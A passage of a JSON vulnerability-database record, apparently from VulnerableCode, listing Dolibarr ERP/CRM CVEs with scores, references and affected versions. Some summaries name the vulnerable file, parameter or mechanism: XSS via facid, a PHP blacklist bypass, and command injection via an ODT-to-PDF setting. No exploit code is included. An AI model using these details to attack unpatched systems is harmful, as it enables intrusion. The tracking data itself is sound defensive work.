nerability":"VCID-3ust-28tv-mkd5"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-53d8-7k7n-vud1"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-884a-z62x-dyhq"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-dzuu-tkyp-8udb"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-jmau-m9qu-s3h6"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-qumf-2xyz-tqe5"},{"vulnerability":"VCID-qzu2-uf2r-yydt"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-w6uz-k9fr-jkdr"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@5.0.4"}],"aliases":["CVE-2017-9840","GHSA-cwgm-qw8v-hrrg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-65zj-gtdx-7ydm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49790?format=json","vulnerability_id":"VCID-6mqr-g619-dqbu","summary":"A Reflected Cross-site scripting (XSS) vulnerability located in htdocs/compta/paiement/card.php of Dolibarr before 19.0.2 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into the facid parameter.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34051","reference_id":"","reference_type":"","scores":[{"value":"0.00966","scoring_system":"epss","scoring_elements":"0.7699","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34051"},{"reference_url":"https://blog.smarttecs.com/posts/2024-004-cve-2024-34051","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://blog.smarttecs.com/posts/2024-004-cve-2024-34051"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/3a3ccc253b8eceddee84f158b2c262a4033b9402","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/3a3ccc253b8eceddee84f158b2c262a4033b9402"},{"reference_url":"https://blog.smarttecs.com/posts/2024-004-cve-2024-34051/","reference_id":"2024-004-cve-2024-34051","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-20T15:43:14Z/"}],"url":"https://blog.smarttecs.com/posts/2024-004-cve-2024-34051/"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34051","reference_id":"CVE-2024-34051","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34051"},{"reference_url":"https://github.com/advisories/GHSA-hv2j-6654-x74q","reference_id":"GHSA-hv2j-6654-x74q","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hv2j-6654-x74q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/31892?format=json","purl":"pkg:composer/dolibarr/dolibarr@19.0.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2"}],"aliases":["CVE-2024-34051","GHSA-hv2j-6654-x74q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6mqr-g619-dqbu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/309934?format=json","vulnerability_id":"VCID-73pa-djjd-4ufu","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-11201","reference_id":"","reference_type":"","scores":[{"value":"0.00559","scoring_system":"epss","scoring_elements":"0.68706","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-11201"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/63c0ab93fb21f86c1b736061af9fa1eee90148fd","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/63c0ab93fb21f86c1b736061af9fa1eee90148fd"},{"reference_url":"https://github.com/Dolibarr/dolibarr/issues/10984#issuecomment-485841141","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/issues/10984#issuecomment-485841141"},{"reference_url":"https://know.bishopfox.com/advisories/dolibarr-version-9-0-1-vulnerabilities","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://know.bishopfox.com/advisories/dolibarr-version-9-0-1-vulnerabilities"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-11201","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-11201"},{"reference_url":"https://github.com/advisories/GHSA-jwg3-v9xm-v6q9","reference_id":"GHSA-jwg3-v9xm-v6q9","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-jwg3-v9xm-v6q9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/455558?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2"},{"url":"http://public2.vulnerablecode.io/api/packages/384742?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.3"}],"aliases":["CVE-2019-11201","GHSA-jwg3-v9xm-v6q9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-73pa-djjd-4ufu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/72301?format=json","vulnerability_id":"VCID-76rs-x78m-1fg6","summary":"A security flaw has been discovered in Dolibarr ERP CRM up to 23.0.2. This vulnerability affects the function dol_verifyHash in the library htdocs/core/lib/security.lib.php of the component Online Signature Module. The manipulation results in improper verification of cryptographic signature. The attack may be performed from remote. Attacks of this nature are highly complex. It is stated that the exploitability is difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-7689","reference_id":"","reference_type":"","scores":[{"value":"9e-05","scoring_system":"epss","scoring_elements":"0.01017","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-7689"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-7689","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-7689"},{"reference_url":"https://vuldb.com/vuln/360859","reference_id":"360859","reference_type":"","scores":[{"value":"2.6","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR"},{"value":"3.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R"},{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R"},{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/"}],"url":"https://vuldb.com/vuln/360859"},{"reference_url":"https://vuldb.com/submit/801794","reference_id":"801794","reference_type":"","scores":[{"value":"2.6","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR"},{"value":"3.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R"},{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R"},{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/"}],"url":"https://vuldb.com/submit/801794"},{"reference_url":"https://vuldb.com/vuln/360859/cti","reference_id":"cti","reference_type":"","scores":[{"value":"2.6","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR"},{"value":"3.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R"},{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R"},{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/"}],"url":"https://vuldb.com/vuln/360859/cti"},{"reference_url":"https://gist.github.com/Shaon-Xis/d6ae069fc54f006457b68a91d5a8e158","reference_id":"d6ae069fc54f006457b68a91d5a8e158","reference_type":"","scores":[{"value":"2.6","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR"},{"value":"3.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R"},{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R"},{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/"}],"url":"https://gist.github.com/Shaon-Xis/d6ae069fc54f006457b68a91d5a8e158"},{"reference_url":"https://github.com/advisories/GHSA-jggh-5rmh-r6h5","reference_id":"GHSA-jggh-5rmh-r6h5","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-jggh-5rmh-r6h5"}],"fixed_packages":[],"aliases":["CVE-2026-7689","GHSA-jggh-5rmh-r6h5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-76rs-x78m-1fg6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71461?format=json","vulnerability_id":"VCID-79w7-szqt-wfeq","summary":"In the Website module of Dolibarr ERP & CRM 22.0.4 and below, the application uses blacklist-based filtering to restrict dangerous PHP functions related to system command execution. An authenticated user with permission to edit PHP content can bypass this filtering, resulting in full remote code execution with the ability to execute arbitrary operating system commands on the server.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31019","reference_id":"","reference_type":"","scores":[{"value":"0.00119","scoring_system":"epss","scoring_elements":"0.30466","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31019"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31019","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31019"},{"reference_url":"http://dolibarr.com","reference_id":"dolibarr.com","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T18:23:29Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://github.com/advisories/GHSA-j2g9-rprv-hrhc","reference_id":"GHSA-j2g9-rprv-hrhc","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-j2g9-rprv-hrhc"},{"reference_url":"https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31019/README.md","reference_id":"README.md","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T18:23:29Z/"}],"url":"https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31019/README.md"}],"fixed_packages":[],"aliases":["CVE-2026-31019","GHSA-j2g9-rprv-hrhc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-79w7-szqt-wfeq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/66743?format=json","vulnerability_id":"VCID-7g1w-ar9a-r7fb","summary":"Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions prior to 23.0.0 , the ODT to PDF conversion process in odf.php concatenates the MAIN_ODT_AS_PDF configuration constant directly into a shell command passed to exec() without sanitization. An authenticated administrator can inject arbitrary OS commands via this constant using command separators, achieving remote code execution as the web server user when any ODT template is generated. This issue has been fixed in version 23.0.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-23500","reference_id":"","reference_type":"","scores":[{"value":"0.00166","scoring_system":"epss","scoring_elements":"0.37487","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-23500"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23500","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23500"},{"reference_url":"https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0","reference_id":"23.0.0","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-18T03:06:09Z/"}],"url":"https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0"},{"reference_url":"https://github.com/advisories/GHSA-w5j3-8fcr-h87w","reference_id":"GHSA-w5j3-8fcr-h87w","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-w5j3-8fcr-h87w"},{"reference_url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w","reference_id":"GHSA-w5j3-8fcr-h87w","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-18T03:06:09Z/"}],"url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w"}],"fixed_packages":[],"aliases":["CVE-2026-23500","GHSA-w5j3-8fcr-h87w"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7g1w-ar9a-r7fb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/206961?format=json","vulnerability_id":"VCID-83c2-jnk3-mbau","summary":"Dolibarr Cross Site Scripting (XSS) vulnerability","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-42220","reference_id":"","reference_type":"","scores":[{"value":"0.00271","scoring_system":"epss","scoring_elements":"0.50834","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-42220"},{"reference_url":"https://packetstormsecurity.com/files/164544/Dolibarr-ERP-CRM-14.0.2-Cross-Site-Scripting-Privilege-Escalation.html","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://packetstormsecurity.com/files/164544/Dolibarr-ERP-CRM-14.0.2-Cross-Site-Scripting-Privilege-Escalation.html"},{"reference_url":"https://truedigitalsecurity.com/advisory-summary-2021","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://truedigitalsecurity.com/advisory-summary-2021"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42220","reference_id":"CVE-2021-42220","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42220"},{"reference_url":"https://github.com/advisories/GHSA-jqfp-m5f8